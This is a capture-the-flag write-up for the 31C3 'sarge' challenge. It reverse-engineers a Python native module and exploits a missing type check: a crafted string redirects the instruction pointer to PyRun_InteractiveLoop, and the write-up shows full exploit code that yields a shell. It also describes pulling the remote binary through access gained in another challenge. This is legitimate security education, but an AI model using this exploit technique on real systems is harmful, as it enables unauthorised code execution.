31C3 CTF - sarge Writeup
30 January 2015 by skuBinary analysis
Sarge consists of two files, a python script server.py
and a shared object sarge.so
:
#!/usr/bin/env python2
import sarge
import msgpack
import struct
sge = sarge.Sarge(file("./flag").read().strip())
def objecthook(code, data):
if code == 42:
return sarge.Sargecmd(data)
return msgpack.ExtType(code, data)
data = msgpack.unpackb(raw_input(), ext_hook = objecthook)
if sge.authenticate(data["authentication"]):
data["execute"].run()
else:
print "Nope"
The file immediately imports the native python module contained in sarge.so
:
$ file sarge.so
sarge.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=3eb654b9ae4dee25a7cd3f52ebed3575f2da8435, not stripped
$ strings -a sarge.so | grep Py
PyTuple_GetItem
PyString_AsString
Py_BuildValue
PyTuple_Size
PyDict_Contains
...
$ nm sarge.so | grep sarge
0000000000000fb0 T initsarge
0000000000000e90 t sarge_authenticate
0000000000000d80 t sargecmd_dealloc
00000000002022c0 d sargecmd_methods
0000000000000d90 t sargecmd_new
0000000000000e00 t sargecmd_run
0000000000202100 d sargecmd_type
0000000000000f90 t sarge_dealloc
00000000002024c0 d sarge_methods
0000000000000e20 t sarge_new
0000000000202300 d sarge_type
As expected from the python code, we can see that the sarge.Sarge
constructor takes one argument (the flag string) and stores it for later use.
The user data supplied via raw_input
is then used to unpack a message using the msgpack
framework. Ignoring the possibility of a bug inside that 3rd party module for a moment, lets move on to the next point of interest: sarge.Sarge.authenticate
, or sarge_authenticate
in the binary. A quick glance over the function allows us to summarize the behaviour:
- Grab the first user argument (which came from
data["authentication"]
), lets call itarg
- Treat argument
arg
as a pythondict
- Check if
arg
contains the key"s3cr3t"
- Only proceed to 5) if the key is present, otherwise exit
- Set
s = arg["secret"]
- Compare secret
s
to the flag, returnTrue
if they are the same, otherwiseFalse
Since we don't know the flag and don't have time for side-channel attacks, we should consider finding a different attack vector.
You are just not my type
Messing around with the possible data["authentication"]
arguments, we can reveal a tiny flaw in the otherwise perfect authentication system: nobody is actually checking the type! The binary happily calls PyDict_Contains
on the user supplied argument, expecting it to be a python dict
. Lets try it with a string instead:
mport sarge
data = {"authentication": "AAAAAAAAAAAA\x04\x03\x02\x01\x00\x00\x00\x00"}
sge = sarge.Sarge(file("./flag").read().strip())
sge.authenticate(data["authentication"])
Lets run it:
$ python pwndemo.py
Segmentation fault (core dumped)
Crash, awesome! Inspect the core dump:
$ gdb python core
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x0000000001020304 in ?? ()
gdb-peda$ i stack
#0 0x0000000001020304 in ?? ()
#1 0x00000000004a16b7 in PyDict_Contains ()
#2 0x00007f65fe2e0ee4 in sarge_authenticate
Instruction pointer control, game over!
It's not over
Okay, so by providing a string
instead of a dict
, we can control the instruction pointer, but where do we go from here? I'm quite sure there is an elegant solution to this problem, but I didn't see it immediately. I don't know where system
or any other useful function is, and I wouldn't know how to provide proper arguments either.
Ideally, we would want to find something like system("/bin/sh")
at a known location. Scanning through my python binary, I could not find anything of the sort. Then it hit me: find the python interpreter loop inside the python binary and jump there!
The interactive python session greets us with the python version and some other information, and then it prints this character sequence: ">>>"
We can find this string once in the binary, and it's being referenced by the function PyRun_InteractiveLoopFlags
, which in turn is called by PyRun_InteractiveLoop
. Isn't this the greatest thing ever?
.text:000000000046994A
.text:000000000046994A public PyRun_InteractiveLoop
.text:000000000046994A PyRun_InteractiveLoop proc near
.text:000000000046994A xor edx, edx
.text:000000000046994C jmp PyRun_InteractiveLoopFlags
.text:000000000046994C PyR
Your addresses may be different. You know what's even better? Binaries that have not been compiled with position independent code, like uhm.. python on most popular distros!
Local exploit code
The following exploit gives me an interactive python session after exploiting the type confusion vulnerability:
import msgpack
import sys
import struct
import sarge
def default(obj):
return obj
def objecthook(code, data):
if code == 42:
return sarge.Sargecmd(data)
return msgpack.ExtType(code, data)
sge = sarge.Sarge(file("./flag").read().strip())
data = {}
loopdiloop = 0x46994A
data["authentication"] = 'a'*12 + struct.pack('<Q', loopdiloop)
m = msgpack.packb(data, default=default)
data = msgpack.unpackb(m, ext_hook = objecthook)
if sge.authenticate(data["authentication"]):
data["execute"].run()
else:
print "Nope"
$ python pwn.py
>>> import os;os.system('/bin/sh')
$ echo "winning"
winning
Remote exploit
One problem remains: finding the address of PyRun_InteractiveLoop
in the remote python binary.
I wonder if they used the same distro/binaries on all of their challenge VMs
Lets use the cfy solution to ssh into their cfy VM, pretend to solve cfy2
scp their python binary, find PyRun_InteractiveLoop
Yup, 20 points.
Big thanks to Andi for providing the initial sample code to get %rip
control.